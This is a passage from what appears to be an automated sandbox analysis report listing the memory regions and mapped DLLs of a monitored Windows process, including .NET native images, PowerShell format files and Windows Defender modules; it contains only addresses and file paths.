filename = "" Region: id = 6801 start_va = 0x7ffaa9e20000 end_va = 0x7ffaa9e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e20000" filename = "" Region: id = 6806 start_va = 0x7ffaa9e30000 end_va = 0x7ffaa9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e30000" filename = "" Region: id = 6811 start_va = 0x7ffaa9e40000 end_va = 0x7ffaa9e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e40000" filename = "" Region: id = 6820 start_va = 0x7ffaa9e50000 end_va = 0x7ffaa9e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e50000" filename = "" Region: id = 6821 start_va = 0x7ffaa9e60000 end_va = 0x7ffaa9e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e60000" filename = "" Region: id = 6826 start_va = 0x7ffaa9e70000 end_va = 0x7ffaa9e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e70000" filename = "" Region: id = 6831 start_va = 0x7ffaa9e80000 end_va = 0x7ffaa9e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e80000" filename = "" Region: id = 6832 start_va = 0x7ffaa9e90000 end_va = 0x7ffaa9e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e90000" filename = "" Region: id = 6841 start_va = 0x7ffaa9ea0000 end_va = 0x7ffaa9eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ea0000" filename = "" Region: id = 6846 start_va = 0x7ffaa9eb0000 end_va = 0x7ffaa9ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9eb0000" filename = "" Region: id = 6868 start_va = 0x7ffaa9ec0000 end_va = 0x7ffaa9ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ec0000" filename = "" Region: id = 7028 start_va = 0x7ffb1e090000 end_va = 0x7ffb1e0bbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\system.configuration.install.ni.dll") Region: id = 7064 start_va = 0x7ffb0e0f0000 end_va = 0x7ffb0e1c6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\aa72dbe028c273873c1324bb840af088\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\aa72dbe028c273873c1324bb840af088\\system.transactions.ni.dll") Region: id = 7065 start_va = 0x7ffb182c0000 end_va = 0x7ffb1830cfff monitored = 1 entry_point = 0x7ffb182dfe9a region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 7066 start_va = 0x1a440000 end_va = 0x1a48afff monitored = 1 entry_point = 0x1a45fe9a region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 7067 start_va = 0x1a560000 end_va = 0x1a56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a560000" filename = "" Region: id = 7379 start_va = 0x7ffb1cb90000 end_va = 0x7ffb1cb94fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.diagnostics.tracing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\system.diagnostics.tracing.ni.dll") Region: id = 7420 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7421 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 7422 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 7423 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 7424 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 7447 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7448 start_va = 0x1e60000 end_va = 0x1e60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 7468 start_va = 0x1f00000 end_va = 0x1f00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 7469 start_va = 0x1f00000 end_va = 0x1f08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 7470 start_va = 0x1f00000 end_va = 0x1f00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 7471 start_va = 0x1f00000 end_va = 0x1f08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 7472 start_va = 0x1f00000 end_va = 0x1f00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 7491 start_va = 0x1f00000 end_va = 0x1f08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 7591 start_va = 0x1a440000 end_va = 0x1a4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a440000" filename = "" Region: id = 7592 start_va = 0x1a4c0000 end_va = 0x1a53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a4c0000" filename = "" Region: id = 7710 start_va = 0x7ffaa9ed0000 end_va = 0x7ffaa9edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ed0000" filename = "" Region: id = 7754 start_va = 0x7ffaa9ee0000 end_va = 0x7ffaa9eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ee0000" filename = "" Region: id = 7762 start_va = 0x7ffb0e640000 end_va = 0x7ffb0e744fff monitored = 1 entry_point = 0x7ffb0e64107c region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 7763 start_va = 0x1f00000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 7848 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 7868 start_va = 0x7ffaa9ef0000 end_va = 0x7ffaa9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9ef0000" filename = "" Region: id = 7876 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 7968 start_va = 0x1a570000 end_va = 0x1a66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a570000" filename = "" Region: id = 7969 start_va = 0x7ffb0e5d0000 end_va = 0x7ffb0e631fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\microsoft.powershell.security.ni.dll") Region: id = 8066 start_va = 0x7ffaa9f00000 end_va = 0x7ffaa9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f00000" filename = "" Region: id = 8104 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 8105 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 8163 start_va = 0x1a670000 end_va = 0x1a76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a670000" filename = "" Region: id = 8202 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 8203 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 8302 start_va = 0x7ffaa9f10000 end_va = 0x7ffaa9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f10000" filename = "" Region: id = 8400 start_va = 0x7ffaa9f20000 end_va = 0x7ffaa9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f20000" filename = "" Region: id = 8421 start_va = 0x7ffaa9f30000 end_va = 0x7ffaa9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f30000" filename = "" Region: id = 8508 start_va = 0x7ffb0dfd0000 end_va = 0x7ffb0e0effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\system.configuration.ni.dll") Region: id = 8589 start_va = 0x7ffb1b040000 end_va = 0x7ffb1b04bfff monitored = 0 entry_point = 0x7ffb1b0418b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 8590 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 8591 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 8592 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 8610 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 8611 start_va = 0x1a770000 end_va = 0x1a7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a770000" filename = "" Region: id = 8612 start_va = 0x20c0000 end_va = 0x20d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 8676 start_va = 0x1f20000 end_va = 0x1f23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 8677 start_va = 0x1a7f0000 end_va = 0x1a86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a7f0000" filename = "" Region: id = 8715 start_va = 0x1a870000 end_va = 0x1aa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a870000" filename = "" Region: id = 8794 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 8812 start_va = 0x1aa70000 end_va = 0x1ae6afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001aa70000" filename = "" Region: id = 8813 start_va = 0x1f20000 end_va = 0x1f23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 8850 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9054 start_va = 0x1ae70000 end_va = 0x1ae91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 9055 start_va = 0x1ae70000 end_va = 0x1ae91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 9056 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9091 start_va = 0x1f20000 end_va = 0x1f26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 9092 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9129 start_va = 0x1ae70000 end_va = 0x1aeb4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 9130 start_va = 0x1ae70000 end_va = 0x1aeb4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 9149 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9214 start_va = 0x1ae70000 end_va = 0x1aea3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 9215 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9276 start_va = 0x1ae70000 end_va = 0x1aea2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 9295 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9323 start_va = 0x1f20000 end_va = 0x1f21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershelltrace.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml") Region: id = 9324 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9332 start_va = 0x1f20000 end_va = 0x1f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 9333 start_va = 0x1f20000 end_va = 0x1f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 9334 start_va = 0x1ae70000 end_va = 0x1ae97fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 9429 start_va = 0x1f20000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 9430 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 9493 start_va = 0x1ae70000 end_va = 0x1b7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae70000" filename = "" Region: id = 9494 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 9516 start_va = 0x1b800000 end_va = 0x1b88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b800000" filename = "" Region: id = 9552 start_va = 0x1b890000 end_va = 0x1b96cfff monitored = 0 entry_point = 0x1b8ee0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 9632 start_va = 0x1b800000 end_va = 0x1b87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b800000" filename = "" Region: id = 9633 start_va = 0x1b880000 end_va = 0x1b88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b880000" filename = "" Region: id = 9634 start_va = 0x1b890000 end_va = 0x1b90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b890000" filename = "" Region: id = 9635 start_va = 0x1b910000 end_va = 0x1b98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b910000" filename = "" Region: id = 9716 start_va = 0x7ffb1cb80000 end_va = 0x7ffb1cb8ffff monitored = 0 entry_point = 0x7ffb1cb851b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 9717 start_va = 0x1f20000 end_va = 0x1f20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 9718 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 9719 start_va = 0x20e0000 end_va = 0x20e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 9720 start_va = 0x7ffb1cb60000 end_va = 0x7ffb1cb7cfff monitored = 0 entry_point = 0x7ffb1cb6e930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 9721 start_va = 0x7ffb0de70000 end_va = 0x7ffb0df4efff monitored = 0 entry_point = 0x7ffb0dea4ef0 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 9722 start_va = 0x1a540000 end_va = 0x1a541fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 9723 start_va = 0x1b990000 end_va = 0x1ba8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b990000" filename = "" Region: id = 9724 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 9729 start_va = 0x1ba90000 end_va = 0x1babdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ba90000" filename = "" Region: id = 9730 start_va = 0x1bac0000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bac0000" filename = "" Region: id = 9731 start_va = 0x1bb40000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 9736 start_va = 0x7ffaa9f40000 end_va = 0x7ffaa9f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f40000" filename = "" Region: id = 9737 start_va = 0x7ffaa9f50000 end_va = 0x7ffaa9f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f50000" filename = "" Region: id = 9739 start_va = 0x1a540000 end_va = 0x1a54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a540000" filename = "" Region: id = 9769 start_va = 0x7ffb03d90000 end_va = 0x7ffb040c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\system.runtime.serialization.ni.dll") Region: id = 9770 start_va = 0x7ffb1c950000 end_va = 0x7ffb1c974fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\3aa7da61075c3a19976503e08685ea9c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\3aa7da61075c3a19976503e08685ea9c\\smdiagnostics.ni.dll") Region: id = 9775 start_va = 0x7ffb0ac50000 end_va = 